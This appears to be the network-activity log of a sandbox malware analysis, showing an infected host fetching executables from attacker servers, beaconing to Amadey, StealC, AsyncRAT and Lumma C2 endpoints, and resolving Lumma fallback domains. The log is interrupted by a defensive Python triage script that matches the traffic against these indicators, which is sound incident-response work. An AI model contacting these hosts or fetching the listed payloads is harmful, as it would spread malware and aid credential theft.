                    HTTP Request

                    GET http://31.41.244.11/files/1521297942/H3tyh96.exe

                    HTTP Response

                    200

                    HTTP Request

                    GET http://31.41.244.11/files/8049824649/yiklfON.exe

                    HTTP Response

                    200

                    HTTP Request

                    GET http://31.41.244.11/files/523681048/3EUEYgl.exe

                    HTTP Response

                    200

                    HTTP Request

                    GET http://31.41.244.11/files/unique2/random.exe

                    HTTP Response

                    200
                  • 185.215.113.206:80
                    http://185.215.113.206/c4becf79229cb002.php
                    http
                    3d69R.exe
                    819 B
                    625 B
                    7
                    5

                    HTTP Request

                    GET http://185.215.113.206/

                    HTTP Response

                    200

                    HTTP Request

                    POST http://185.215.113.206/c4becf79229cb002.php

                    HTTP Response

                    200
                  • 205.209.109.10:4449
                    tls
                    H3tyh96.exe
                    6.4kB
                    4.2kB
                    48
                    44
                  • 172.67.213.48:443
                    https://fightlsoser.click/api
                    tls, http
                    Z9Pp9pM.exe
                    1.0kB
                    4.8kB
                    9
                    9

                    HTTP Request

                    POST https://fightlsoser.click/api

                    HTTP Response

                    200
                  • 172.67.206.64:443
                    https://covery-mover.biz/api
                    tls, http
                    Z9Pp9pM.exe
                    1.1kB
                    4.9kB
                    10
                    11

                    HTTP Request

                    POST https://covery-mover.biz/api

                    HTTP Response

                    200
                  • 23.214.143.155:443
                    https://steamcommunity.com/profiles/76561199724331900
                    tls, http
                    Z9Pp9pM.exe
                    1.6kB
                    43.2kB
                    22
                    37

                    HTTP Request

                    GET https://steamcommunity.com/profiles/76561199724331900

                    HTTP Response

                    200
                  • 149.154.167.99:443
                    https://t.me/detct0r
                    tls, http
                    3EUEYgl.exe
                    1.5kB
                    19.5kB
                    24
                    21

                    HTTP Request

                    GET https://t.me/detct0r

                    HTTP Response

                    200
                  • 116.203.10.31:443
                    https://ooihu.shop/
                    tls, http
                    3EUEYgl.exe
                    1.0kB
                    3.0kB
                    11
                    8

                    HTTP Request

                    GET https://ooihu.shop/

                    HTTP Response

                    200
                  • 116.203.10.31:443
                    https://ooihu.shop/
                    tls, http
                    3EUEYgl.exe
                    1.4kB
                    565 B
                    9
                    6

                    HTTP Request

                    POST https://ooihu.shop/

                    HTTP Response

                    200
                  • 116.203.10.31:443
                    https://ooihu.shop/
                    tls, http
                    3EUEYgl.exe
                    1.5kB
                    598 B
                    9
                    7

                    HTTP Request

                    POST https://ooihu.shop/

                    HTTP Response

                    200
                  • 88.221.135.115:80
                    http://e6.o.lencr.org/MFMwUTBPME0wSzAJBgUrDgMCGgUABBTUejiAQejpjQc4fOz2ttjyD6VkMQQUDcXM%2FZvuFAWhTDCCpT5eisNYCdICEgP4k%2Bk5CwN3hyog%2B%2FDYppS8vw%3D%3D
                    http
                    3EUEYgl.exe
                    525 B
                    915 B
                    6
                    4

                    HTTP Request

                    GET http://e6.o.lencr.org/MFMwUTBPME0wSzAJBgUrDgMCGgUABBTUejiAQejpjQc4fOz2ttjyD6VkMQQUDcXM%2FZvuFAWhTDCCpT5eisNYCdICEgP4k%2Bk5CwN3hyog%2B%2FDYppS8vw%3D%3D

                    HTTP Response

                    200
                  • 116.203.10.31:443
                    https://ooihu.shop/
                    tls, http
                    3EUEYgl.exe
                    2.6kB
                    634 B
                    11
                    7

                    HTTP Request

                    POST https://ooihu.shop/

                    HTTP Response

                    200
                  • 116.203.10.31:443
                    https://ooihu.shop/
                    tls, http
                    3EUEYgl.exe
                    1.5kB
                    598 B
                    10
                    7

                    HTTP Request

                    POST https://ooihu.shop/

                    HTTP Response

                    200
                  • 116.203.10.31:443
                    https://ooihu.shop/
                    tls, http
                    3EUEYgl.exe
                    1.5kB
                    558 B
                    9
                    6

                    HTTP Request

                    POST https://ooihu.shop/

                    HTTP Response

                    200
                  • 116.203.10.31:443
                    https://ooihu.shop/
                    tls, http
                    3EUEYgl.exe
                    1.8kB
                    518 B
                    9
                    5

                    HTTP Request

                    POST https://ooihu.shop/

                    HTTP Response

                    200
                  • 116.203.10.31:443
                    https://ooihu.shop/
                    tls, http
                    3EUEYgl.exe
                    1.4kB
                    518 B
                    8
                    5

                    HTTP Request

                    POST https://ooihu.shop/

                    HTTP Response

                    200
                  • 185.215.113.16:80
                    http://185.215.113.16/off/random.exe
                    http
                    skotes.exe
                    239.2kB
                    7.5MB
                    4628
                    5383

                    HTTP Request

                    GET http://185.215.113.16/luma/random.exe

                    HTTP Response

                    200

                    HTTP Request

                    GET http://185.215.113.16/steam/random.exe

                    HTTP Response

                    200

                    HTTP Request

                    GET http://185.215.113.16/well/random.exe

                    HTTP Response

                    200

                    HTTP Request

                    GET http://185.215.113.16/off/random.exe

                    HTTP Response

                    200
                  • 80.82.65.70:80
                    http://80.82.65.70/soft/download
                    http
                    f47698ce5b.exe
                    40.0kB
                    1.5MB
                    701
                    1109

                    HTTP Request

                    GET http://80.82.65.70/add?substr=mixtwo&s=three&sub=emp

                    HTTP Response

                    200

                    HTTP Request

                    GET http://80.82.65.70/dll/key

                    HTTP Response

                    200

                    HTTP Request

                    GET http://80.82.65.70/dll/download

                    HTTP Response

                    200

                    HTTP Request

                    GET http://80.82.65.70/files/download

                    HTTP Response

                    200

                    HTTP Request

                    GET http://80.82.65.70/files/download

                    HTTP Response

                    200

                    HTTP Request

                    GET http://80.82.65.70/files/download

                    HTTP Response

                    200

                    HTTP Request

                    GET http://80.82.65.70/files/download

                    HTTP Response

                    200

                    HTTP Request

                    GET http://80.82.65.70/files/download

                    HTTP Response

                    200

                    HTTP Request

                    GET http://80.82.65.70/files/download

                    HTTP Response

                    200

                    HTTP Request

                    GET http://80.82.65.70/files/download

                    HTTP Response

                    200

                    HTTP Request

                    GET http://80.82.65.70/files/download

                    HTTP Response

                    200

                    HTTP Request

                    GET http://80.82.65.70/files/download

                    HTTP Response

                    200

                    HTTP Request

                    GET http://80.82.65.70/files/download

                    HTTP Response

                    200

                    HTTP Request

                    GET http://80.82.65.70/files/download

                    HTTP Response

                    200

                    HTTP Request

                    GET http://80.82.65.70/soft/download

                    HTTP Response

                    200

                    HTTP Request

                    GET http://80.82.65.70/soft/download

                    HTTP Response

                    200
                  • 104.21.96.1:443
                    https://atten-supporse.biz/api
                    tls, http
                    f3745b045c.exe
                    1.0kB
                    4.8kB
                    9
                    9

                    HTTP Request

                    POST https://atten-supporse.biz/api

                    HTTP Response

                    200
                  • 172.67.206.64:443
                    https://covery-mover.biz/api
                    tls, http
                    f3745b045c.exe
                    1.0kB
                    4.8kB
                    9
                    9

                    HTTP Request

                    POST https://covery-mover.biz/api

                    HTTP Response

                    200
                  • 23.214.143.155:443
                    https://steamcommunity.com/profiles/76561199724331900
                    tls, http
                    f3745b045c.exe
                    2.2kB
                    44.3kB
                    31
                    37

                    HTTP Request

                    GET https://steamcommunity.com/profiles/76561199724331900

                    HTTP Response

                    200
                  • 185.215.113.206:80
                    http://185.215.113.206/c4becf79229cb002.php
                    http
                    0858ba6bc7.exe
                    819 B
                    625 B
                    7
                    5

                    HTTP Request

                    GET http://185.215.113.206/

                    HTTP Response

                    200

                    HTTP Request

                    POST http://185.215.113.206/c4becf79229cb002.php

                    HTTP Response

                    200
                  • 34.149.97.1:443
                    https://firefox-api-proxy.cdn.mozilla.net/desktop/v1/recommendations?locale=en-US&region=GB&count=30
                    tls, http2
                    firefox.exe
                    2.9kB
                    12.8kB
                    22
                    22

                    HTTP Request

                    GET https://firefox-api-proxy.cdn.mozilla.net/desktop/v1/recommendations?locale=en-US&region=GB&count=30
                  • 216.58.213.14:443
                    youtube.com
                    firefox.exe
                    52 B
                    1
                  • 216.58.213.14:443
                    youtube.com
                    firefox.exe
                    52 B
                    1
                  • 216.58.213.14:443
                    https://www.youtube.com/account?=https%3A%2F%2Faccounts.google.com%2Fv3%2Fsignin%2Fchallenge%2Fpwd
                    tls, http2
                    firefox.exe
                    3.0kB
                    10.0kB
                    19
                    20

                    HTTP Request

                    GET https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd

                    HTTP Request

                    GET https://www.youtube.com/account?=https%3A%2F%2Faccounts.google.com%2Fv3%2Fsignin%2Fchallenge%2Fpwd
                  • 172.217.16.238:443
                    www.youtube.com
                    tls
                    firefox.exe
                    1.1kB
                    6.9kB
                    10
                    8
                  • 142.250.200.46:443
                    https://consent.youtube.com/m?continue=https%3A%2F%2Fwww.youtube.com%2Faccount%3F%3Dhttps%253A%252F%252Faccounts.google.com%252Fv3%252Fsignin%252Fchallenge%252Fpwd%26cbrd%3D1&gl=GB&m=0&pc=yt&cm=2&hl=en&src=1
                    tls, http2
                    firefox.exe
                    2.7kB
                    65.0kB
                    25
                    56

                    HTTP Request

                    GET https://consent.youtube.com/m?continue=https%3A%2F%2Fwww.youtube.com%2Faccount%3F%3Dhttps%253A%252F%252Faccounts.google.com%252Fv3%252Fsignin%252Fchallenge%252Fpwd%26cbrd%3D1&gl=GB&m=0&pc=yt&cm=2&hl=en&src=1
                  • 34.117.121.53:443
                    https://firefox-settings-attachments.cdn.mozilla.net/main-workspace/ms-language-packs/b8aa99dd-b2b6-4312-8c40-d15867393b13.ftl
                    tls, http2
                    firefox.exe
                    1.8kB
                    21.3kB
                    21
                    28

                    HTTP Request

                    GET https://firefox-settings-attachments.cdn.mozilla.net/main-workspace/ms-language-packs/b8aa99dd-b2b6-4312-8c40-d15867393b13.ftl
                  • 142.250.187.196:443
                    https://www.google.com/favicon.ico
                    tls, http2
                    firefox.exe
                    2.0kB
                    7.4kB
                    15
                    15

                    HTTP Request

                    GET https://www.google.com/favicon.ico
                  • 127.0.0.1:63593
                    firefox.exe
                  • 127.0.0.1:63601
                    firefox.exe
                  • 142.250.187.196:443
                    www.google.com
                    firefox.exe
                    52 B
                    1
                  • 88.221.134.155:80
                    http://ciscobinary.openh264.org/openh264-win64-31c4d2e4a037526fd30d4e5c39f60885986cf865.zip
                    http
                    firefox.exe
                    18.8kB
                    506.3kB
                    303
                    366

                    HTTP Request

                    GET http://ciscobinary.openh264.org/openh264-win64-31c4d2e4a037526fd30d4e5c39f60885986cf865.zip

                    HTTP Response

                    200
                  • 142.250.187.206:443
                    https://redirector.gvt1.com/edgedl/widevine-cdm/4.10.2710.0-win-x64.zip
                    tls, http2
                    firefox.exe
                    1.8kB
                    8.9kB
                    21
                    20

                    HTTP Request

                    GET https://redirector.gvt1.com/edgedl/widevine-cdm/4.10.2710.0-win-x64.zip
                  • 74.125.175.169:443
                    https://r4---sn-aigzrnsz.gvt1.com/edgedl/widevine-cdm/4.10.2710.0-win-x64.zip?cms_redirect=yes&met=1733860183,&mh=R8&mip=181.215.176.83&mm=28&mn=sn-aigzrnsz&ms=nvh&mt=1733859861&mv=m&mvi=4&pl=27&rmhost=r1---sn-aigzrnsz.gvt1.com&rms=nvh,nvh&shardbypass=sd&smhost=r2---sn-aigzrn7s.gvt1.com
                    tls, http
                    firefox.exe
                    209.0kB
                    5.9MB
                    3311
                    4265

                    HTTP Request

                    GET https://r4---sn-aigzrnsz.gvt1.com/edgedl/widevine-cdm/4.10.2710.0-win-x64.zip?cms_redirect=yes&met=1733860183,&mh=R8&mip=181.215.176.83&mm=28&mn=sn-aigzrnsz&ms=nvh&mt=1733859861&mv=m&mvi=4&pl=27&rmhost=r1---sn-aigzrnsz.gvt1.com&rms=nvh,nvh&shardbypass=sd&smhost=r2---sn-aigzrn7s.gvt1.com

                    HTTP Response

                    200
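The connection entries above are the raw material for triage: the Amadey C2 from the extracted config (http://185.215.113.43/Zu7JuNko/index.php) receives repeated POSTs from skotes.exe, the same process pulls further .exe payloads over plain HTTP, H3tyh96.exe holds a TLS session to the AsyncRAT endpoint 205.209.109.10:4449, and f3745b045c.exe queries the whole Lumma domain list, of which only some names resolve. The following Python script is an added example, not tria.ge tooling and not part of the report: it parses a listing in this bullet format into records and runs the checks a responder would want, matching endpoints and URLs against the C2 indicators transcribed from the Malware Config section, flagging repeated POSTs to one URL from one process, listing cleartext .exe downloads, and listing names that were queried but never answered. The KNOWN_C2 table, the beacon threshold of three and the sample input (a constructed subset of the entries above, with "HTTP Response"/status lines and byte/packet counters omitted) are the example's own assumptions.

```python
import re
from collections import Counter, defaultdict

# Added example, not tria.ge tooling: parse a "•"-bulleted network listing in
# the format rendered above, then cross-check it against the C2 indicators
# taken from the report's Malware Config section and a few behavioural
# heuristics. KNOWN_C2 and the beacon threshold are this example's assumptions.
KNOWN_C2 = {
    "amadey": {"http://185.215.113.43/Zu7JuNko/index.php"},
    "stealc": {"http://185.215.113.206/c4becf79229cb002.php"},
    "asyncrat": {"205.209.109.10:4449", "205.209.109.10:7723"},
    "lumma": {"https://atten-supporse.biz/api", "https://covery-mover.biz/api",
              "https://se-blurry.biz/api", "https://dare-curbys.biz/api"},
}
REQUEST = re.compile(r"^(GET|POST)\s+(\S+)$")
IPV4 = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}$")


def parse_listing(text):
    """Split the listing on '•' bullets and derive one record per bullet."""
    chunks, cur = [], None
    for line in map(str.strip, text.splitlines()):
        if line.startswith("•"):
            cur = [line[1:].strip()]          # first line is the remote endpoint
            chunks.append(cur)
        elif line and cur is not None:
            cur.append(line)
    records = []
    for endpoint, *body in chunks:
        records.append({
            "endpoint": endpoint,
            # the process name is the bare "<name>.exe" line (URLs contain "/")
            "process": next((l for l in body if l.endswith(".exe") and "/" not in l), None),
            "requests": [m.groups() for l in body if (m := REQUEST.match(l))],
            # DNS entries carry the queried name first and a bare "dns" line
            "dns_query": body[0] if "dns" in body else None,
            "dns_answers": [l for l in body if IPV4.match(l)],
        })
    return records


def family_of(name):
    """Which config family, if any, lists this host in one of its C2 IOCs."""
    return next((f for f, s in KNOWN_C2.items() if any(name in i for i in s)), None)


def analyse(records, beacon_threshold=3):
    """Return findings keyed by check name."""
    out = defaultdict(list)
    answered = {}
    for r in records:
        urls = {u for _, u in r["requests"]}
        for family, iocs in KNOWN_C2.items():
            if r["endpoint"] in iocs or urls & iocs:
                out["known_c2"].append((family, r["process"], r["endpoint"]))
        # repeated POSTs to one URL from one process: the Amadey check-in pattern
        for url, n in Counter(u for v, u in r["requests"] if v == "POST").items():
            if n >= beacon_threshold:
                out["beaconing"].append((r["process"], url, n))
        for v, u in r["requests"]:
            if v == "GET" and u.startswith("http://") and u.lower().endswith(".exe"):
                out["cleartext_exe_download"].append((r["process"], u))
        q = r["dns_query"]
        if q and not q.endswith(".in-addr.arpa"):
            # an answered lookup of a name wins over an earlier unanswered one
            answered[q] = answered.get(q, False) or bool(r["dns_answers"])
    out["unanswered_dns"] = sorted((q, family_of(q)) for q, ok in answered.items() if not ok)
    return dict(out)


# Constructed sample: a subset of the entries above, with the "HTTP Response"/
# status lines and byte/packet counters omitted (the parser ignores them).
SAMPLE = """\
• 185.215.113.43:80
http://185.215.113.43/Zu7JuNko/index.php
http
skotes.exe
HTTP Request
POST http://185.215.113.43/Zu7JuNko/index.php
HTTP Request
POST http://185.215.113.43/Zu7JuNko/index.php
HTTP Request
POST http://185.215.113.43/Zu7JuNko/index.php
• 31.41.244.11:80
http://31.41.244.11/files/unique2/random.exe
http
skotes.exe
HTTP Request
GET http://31.41.244.11/files/6904700471/Z9Pp9pM.exe
• 205.209.109.10:4449
tls
H3tyh96.exe
• 8.8.8.8:53
se-blurry.biz
dns
f3745b045c.exe
DNS Request
se-blurry.biz
• 8.8.8.8:53
covery-mover.biz
dns
f3745b045c.exe
DNS Request
covery-mover.biz
DNS Response
172.67.206.64
104.21.58.186
"""

if __name__ == "__main__":
    for check, hits in analyse(parse_listing(SAMPLE)).items():
        print(check, hits)
```

Run against the full listing, the unanswered-DNS check separates the Lumma fallback domains that are not live from the ones the stealer actually reached, and the known_c2 hits give the process-to-family mapping (skotes.exe for Amadey, H3tyh96.exe for AsyncRAT) that the process tree alone does not label.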
                  • 8.8.8.8:53
                    8.8.8.8.in-addr.arpa
                    dns
                    66 B
                    90 B
                    1
                    1

                    DNS Request

                    8.8.8.8.in-addr.arpa

                  • 8.8.8.8:53
                    58.55.71.13.in-addr.arpa
                    dns
                    70 B
                    144 B
                    1
                    1

                    DNS Request

                    58.55.71.13.in-addr.arpa

                  • 8.8.8.8:53
                    90.210.23.2.in-addr.arpa
                    dns
                    70 B
                    133 B
                    1
                    1

                    DNS Request

                    90.210.23.2.in-addr.arpa

                  • 8.8.8.8:53
                    atten-supporse.biz
                    dns
                    f3745b045c.exe
                    64 B
                    176 B
                    1
                    1

                    DNS Request

                    atten-supporse.biz

                    DNS Response

                    104.21.96.1
                    104.21.16.1
                    104.21.64.1
                    104.21.112.1
                    104.21.48.1
                    104.21.80.1
                    104.21.32.1

                  • 8.8.8.8:53
                    138.32.126.40.in-addr.arpa
                    dns
                    72 B
                    158 B
                    1
                    1

                    DNS Request

                    138.32.126.40.in-addr.arpa

                  • 8.8.8.8:53
                    95.221.229.192.in-addr.arpa
                    dns
                    73 B
                    144 B
                    1
                    1

                    DNS Request

                    95.221.229.192.in-addr.arpa

                  • 8.8.8.8:53
                    1.96.21.104.in-addr.arpa
                    dns
                    70 B
                    132 B
                    1
                    1

                    DNS Request

                    1.96.21.104.in-addr.arpa

                  • 8.8.8.8:53
                    se-blurry.biz
                    dns
                    f3745b045c.exe
                    59 B
                    121 B
                    1
                    1

                    DNS Request

                    se-blurry.biz

                  • 8.8.8.8:53
                    zinc-sneark.biz
                    dns
                    f3745b045c.exe
                    61 B
                    123 B
                    1
                    1

                    DNS Request

                    zinc-sneark.biz

                  • 8.8.8.8:53
                    dwell-exclaim.biz
                    dns
                    f3745b045c.exe
                    63 B
                    125 B
                    1
                    1

                    DNS Request

                    dwell-exclaim.biz

                  • 8.8.8.8:53
                    formy-spill.biz
                    dns
                    f3745b045c.exe
                    61 B
                    123 B
                    1
                    1

                    DNS Request

                    formy-spill.biz

                  • 8.8.8.8:53
                    covery-mover.biz
                    dns
                    f3745b045c.exe
                    62 B
                    94 B
                    1
                    1

                    DNS Request

                    covery-mover.biz

                    DNS Response

                    172.67.206.64
                    104.21.58.186

                  • 8.8.8.8:53
                    dare-curbys.biz
                    dns
                    f3745b045c.exe
                    61 B
                    123 B
                    1
                    1

                    DNS Request

                    dare-curbys.biz

                  • 8.8.8.8:53
                    print-vexer.biz
                    dns
                    f3745b045c.exe
                    61 B
                    123 B
                    1
                    1

                    DNS Request

                    print-vexer.biz

                  • 8.8.8.8:53
                    impend-differ.biz
                    dns
                    f3745b045c.exe
                    63 B
                    125 B
                    1
                    1

                    DNS Request

                    impend-differ.biz

                  • 8.8.8.8:53
                    steamcommunity.com
                    dns
                    f3745b045c.exe
                    64 B
                    80 B
                    1
                    1

                    DNS Request

                    steamcommunity.com

                    DNS Response

                    23.214.143.155

                  • 8.8.8.8:53
                    64.206.67.172.in-addr.arpa
                    dns
                    72 B
                    134 B
                    1
                    1

                    DNS Request

                    64.206.67.172.in-addr.arpa

                  • 8.8.8.8:53
                    43.113.215.185.in-addr.arpa
                    dns
                    73 B
                    133 B
                    1
                    1

                    DNS Request

                    43.113.215.185.in-addr.arpa

                  • 224.0.0.251:5353
                    690 B
                    10
                  • 8.8.8.8:53
                    155.143.214.23.in-addr.arpa
                    dns
                    73 B
                    139 B
                    1
                    1

                    DNS Request

                    155.143.214.23.in-addr.arpa

                  • 8.8.8.8:53
                    11.244.41.31.in-addr.arpa
                    dns
                    71 B
                    131 B
                    1
                    1

                    DNS Request

                    11.244.41.31.in-addr.arpa

                  • 8.8.8.8:53
                    206.113.215.185.in-addr.arpa
                    dns
                    74 B
                    134 B
                    1
                    1

                    DNS Request

                    206.113.215.185.in-addr.arpa

                  • 8.8.8.8:53
                    232.168.11.51.in-addr.arpa
                    dns
                    72 B
                    158 B
                    1
                    1

                    DNS Request

                    232.168.11.51.in-addr.arpa

                  • 8.8.8.8:53
                    97.17.167.52.in-addr.arpa
                    dns
                    71 B
                    145 B
                    1
                    1

                    DNS Request

                    97.17.167.52.in-addr.arpa

                  • 8.8.8.8:53
                    197.87.175.4.in-addr.arpa
                    dns
                    71 B
                    157 B
                    1
                    1

                    DNS Request

                    197.87.175.4.in-addr.arpa

                  • 8.8.8.8:53
                    10.109.209.205.in-addr.arpa
                    dns
                    73 B
                    134 B
                    1
                    1

                    DNS Request

                    10.109.209.205.in-addr.arpa

                  • 8.8.8.8:53
                    18.31.95.13.in-addr.arpa
                    dns
                    70 B
                    144 B
                    1
                    1

                    DNS Request

                    18.31.95.13.in-addr.arpa

                  • 8.8.8.8:53
                    134.130.81.91.in-addr.arpa
                    dns
                    72 B
                    147 B
                    1
                    1

                    DNS Request

                    134.130.81.91.in-addr.arpa

                  (columns: destination, domain, protocol, process or - when none, bytes sent/received, packets sent/received)

                  • 8.8.8.8:53  89.210.23.2.in-addr.arpa  dns  -  sent 70 B, recv 133 B, pkts 1/1
                      DNS Request: 89.210.23.2.in-addr.arpa

                  • 8.8.8.8:53  fightlsoser.click  dns  Z9Pp9pM.exe  sent 63 B, recv 95 B, pkts 1/1
                      DNS Request: fightlsoser.click
                      DNS Response: 172.67.213.48, 104.21.35.43

                  • 8.8.8.8:53  se-blurry.biz  dns  f3745b045c.exe  sent 118 B, recv 121 B, pkts 2/1
                      DNS Request (×2): se-blurry.biz

                  • 8.8.8.8:53  48.213.67.172.in-addr.arpa  dns  -  sent 72 B, recv 134 B, pkts 1/1
                      DNS Request: 48.213.67.172.in-addr.arpa

                  • 8.8.8.8:53  zinc-sneark.biz  dns  f3745b045c.exe  sent 61 B, recv 123 B, pkts 1/1
                      DNS Request: zinc-sneark.biz

                  • 8.8.8.8:53  dwell-exclaim.biz  dns  f3745b045c.exe  sent 63 B, recv 125 B, pkts 1/1
                      DNS Request: dwell-exclaim.biz

                  • 8.8.8.8:53  formy-spill.biz  dns  f3745b045c.exe  sent 61 B, recv 123 B, pkts 1/1
                      DNS Request: formy-spill.biz

                  • 8.8.8.8:53  dare-curbys.biz  dns  f3745b045c.exe  sent 61 B, recv 123 B, pkts 1/1
                      DNS Request: dare-curbys.biz

                  • 8.8.8.8:53  print-vexer.biz  dns  f3745b045c.exe  sent 61 B, recv 123 B, pkts 1/1
                      DNS Request: print-vexer.biz

                  • 8.8.8.8:53  impend-differ.biz  dns  f3745b045c.exe  sent 63 B, recv 125 B, pkts 1/1
                      DNS Request: impend-differ.biz

                  • 8.8.8.8:53  steamcommunity.com  dns  f3745b045c.exe  sent 64 B, recv 80 B, pkts 1/1
                      DNS Request: steamcommunity.com
                      DNS Response: 23.214.143.155

                  • 8.8.8.8:53  78.210.23.2.in-addr.arpa  dns  -  sent 70 B, recv 133 B, pkts 1/1
                      DNS Request: 78.210.23.2.in-addr.arpa

                  • 8.8.8.8:53  t.me  dns  3EUEYgl.exe  sent 50 B, recv 66 B, pkts 1/1
                      DNS Request: t.me
                      DNS Response: 149.154.167.99

                  • 8.8.8.8:53  ooihu.shop  dns  3EUEYgl.exe  sent 112 B, recv 144 B, pkts 2/2
                      DNS Request (×2): ooihu.shop
                      DNS Response (×2): 116.203.10.31

                  • 8.8.8.8:53  99.167.154.149.in-addr.arpa  dns  -  sent 73 B, recv 166 B, pkts 1/1
                      DNS Request: 99.167.154.149.in-addr.arpa

                  • 8.8.8.8:53  70.209.201.84.in-addr.arpa  dns  -  sent 72 B, recv 132 B, pkts 1/1
                      DNS Request: 70.209.201.84.in-addr.arpa

                  • 8.8.8.8:53  31.10.203.116.in-addr.arpa  dns  -  sent 72 B, recv 129 B, pkts 1/1
                      DNS Request: 31.10.203.116.in-addr.arpa

                  • 8.8.8.8:53  e6.o.lencr.org  dns  3EUEYgl.exe  sent 120 B, recv 446 B, pkts 2/2
                      DNS Request (×2): e6.o.lencr.org
                      DNS Response (×2, same addresses): 88.221.135.115, 88.221.135.106, 88.221.134.115, 88.221.135.113, 88.221.135.97, 88.221.135.114

                  • 8.8.8.8:53  21.236.111.52.in-addr.arpa  dns  -  sent 72 B, recv 158 B, pkts 1/1
                      DNS Request: 21.236.111.52.in-addr.arpa

                  • 8.8.8.8:53  61.45.26.184.in-addr.arpa  dns  -  sent 71 B, recv 135 B, pkts 1/1
                      DNS Request: 61.45.26.184.in-addr.arpa

                  • 8.8.8.8:53  115.135.221.88.in-addr.arpa  dns  -  sent 73 B, recv 139 B, pkts 1/1
                      DNS Request: 115.135.221.88.in-addr.arpa

                  • 8.8.8.8:53  16.113.215.185.in-addr.arpa  dns  -  sent 73 B, recv 133 B, pkts 1/1
                      DNS Request: 16.113.215.185.in-addr.arpa

                  • 8.8.8.8:53  70.65.82.80.in-addr.arpa  dns  -  sent 140 B, recv 214 B, pkts 2/2
                      DNS Request (×2): 70.65.82.80.in-addr.arpa

                  • 8.8.8.8:53  se-blurry.biz  dns  f3745b045c.exe  sent 118 B, recv 242 B, pkts 2/2
                      DNS Request (×2): se-blurry.biz

                  • 8.8.8.8:53  zinc-sneark.biz  dns  f3745b045c.exe  sent 61 B, recv 123 B, pkts 1/1
                      DNS Request: zinc-sneark.biz

                  • 8.8.8.8:53  dwell-exclaim.biz  dns  f3745b045c.exe  sent 126 B, recv 250 B, pkts 2/2
                      DNS Request (×2): dwell-exclaim.biz

                  • 8.8.8.8:53  formy-spill.biz  dns  f3745b045c.exe  sent 61 B, recv 123 B, pkts 1/1
                      DNS Request: formy-spill.biz

                  • 8.8.8.8:53  dare-curbys.biz  dns  f3745b045c.exe  sent 61 B, recv 123 B, pkts 1/1
                      DNS Request: dare-curbys.biz

                  • 8.8.8.8:53  print-vexer.biz  dns  f3745b045c.exe  sent 61 B, recv 123 B, pkts 1/1
                      DNS Request: print-vexer.biz

                  • 8.8.8.8:53  impend-differ.biz  dns  f3745b045c.exe  sent 63 B, recv 125 B, pkts 1/1
                      DNS Request: impend-differ.biz

                  • 8.8.8.8:53  steamcommunity.com  dns  f3745b045c.exe  sent 128 B, recv 160 B, pkts 2/2
                      DNS Request (×2): steamcommunity.com
                      DNS Response (×2): 23.214.143.155

                  • 8.8.8.8:53  youtube.com  dns  firefox.exe  sent 114 B, recv 146 B, pkts 2/2
                      DNS Request (×2): youtube.com
                      DNS Response (×2): 216.58.213.14

                  • 8.8.8.8:53  spocs.getpocket.com  dns  firefox.exe  sent 65 B, recv 131 B, pkts 1/1
                      DNS Request: spocs.getpocket.com
                      DNS Response: 34.117.188.166

                  • 8.8.8.8:53  firefox-api-proxy.cdn.mozilla.net  dns  firefox.exe  sent 79 B, recv 160 B, pkts 1/1
                      DNS Request: firefox-api-proxy.cdn.mozilla.net
                      DNS Response: 34.149.97.1

                  • 8.8.8.8:53  prod.remote-settings.prod.webservices.mozgcp.net  dns  firefox.exe  sent 188 B, recv 110 B, pkts 2/1
                      DNS Request (×2): prod.remote-settings.prod.webservices.mozgcp.net
                      DNS Response: 34.149.100.209

                  • 8.8.8.8:53  firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net  dns  firefox.exe  sent 200 B, recv 116 B, pkts 2/1
                      DNS Request (×2): firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net
                      DNS Response: 34.149.97.1

                  • 8.8.8.8:53  shavar.prod.mozaws.net  dns  firefox.exe  sent 136 B, recv 232 B, pkts 2/2
                      DNS Request (×2): shavar.prod.mozaws.net
                      DNS Response (×2, same addresses): 44.228.225.150, 35.85.93.176, 54.213.181.160

                  • 8.8.8.8:53  prod.content-signature-chains.prod.webservices.mozgcp.net  dns  firefox.exe  sent 206 B, recv 238 B, pkts 2/2
                      DNS Request (×2): prod.content-signature-chains.prod.webservices.mozgcp.net
                      DNS Response (×2): 34.160.144.191

                  • 8.8.8.8:53  prod.ads.prod.webservices.mozgcp.net  dns  firefox.exe  sent 164 B, recv 196 B, pkts 2/2
                      DNS Request (×2): prod.ads.prod.webservices.mozgcp.net
                      DNS Response (×2): 34.117.188.166

                  • 8.8.8.8:53  youtube.com  dns  firefox.exe  sent 57 B, recv 73 B, pkts 1/1
                      DNS Request: youtube.com
                      DNS Response: 216.58.213.14

                  • 8.8.8.8:53  firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net  dns  firefox.exe  sent 100 B, recv 128 B, pkts 1/1
                      DNS Request: firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net
                      DNS Response: 2600:1901:0:74e4::

                  • 8.8.8.8:53  prod.remote-settings.prod.webservices.mozgcp.net  dns  firefox.exe  sent 188 B, recv 374 B, pkts 2/2
                      DNS Request (×2): prod.remote-settings.prod.webservices.mozgcp.net

                  • 8.8.8.8:53  youtube.com  dns  firefox.exe  sent 57 B, recv 85 B, pkts 1/1
                      DNS Request: youtube.com
                      DNS Response: 2a00:1450:4009:816::200e

                  • 8.8.8.8:53  shavar.prod.mozaws.net  dns  firefox.exe  sent 68 B, recv 153 B, pkts 1/1
                      DNS Request: shavar.prod.mozaws.net

                  • 8.8.8.8:53  prod.content-signature-chains.prod.webservices.mozgcp.net  dns  firefox.exe  sent 103 B, recv 131 B, pkts 1/1
                      DNS Request: prod.content-signature-chains.prod.webservices.mozgcp.net
                      DNS Response: 2600:1901:0:92a9::

                  • 8.8.8.8:53  prod.ads.prod.webservices.mozgcp.net  dns  firefox.exe  sent 82 B, recv 175 B, pkts 1/1
                      DNS Request: prod.ads.prod.webservices.mozgcp.net

                  • 8.8.8.8:53  14.213.58.216.in-addr.arpa  dns  -  sent 72 B, recv 141 B, pkts 1/1
                      DNS Request: 14.213.58.216.in-addr.arpa

                  • 34.149.97.1:443  firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net  https  firefox.exe  sent 1.8kB, recv 4.3kB, pkts 6/6

                  • 216.58.213.14:443  youtube.com  https  firefox.exe  sent 1.9kB, recv 9.3kB, pkts 8/10

                  • 8.8.8.8:53  www.youtube.com  dns  firefox.exe  sent 122 B, recv 670 B, pkts 2/2
                      DNS Request (×2): www.youtube.com
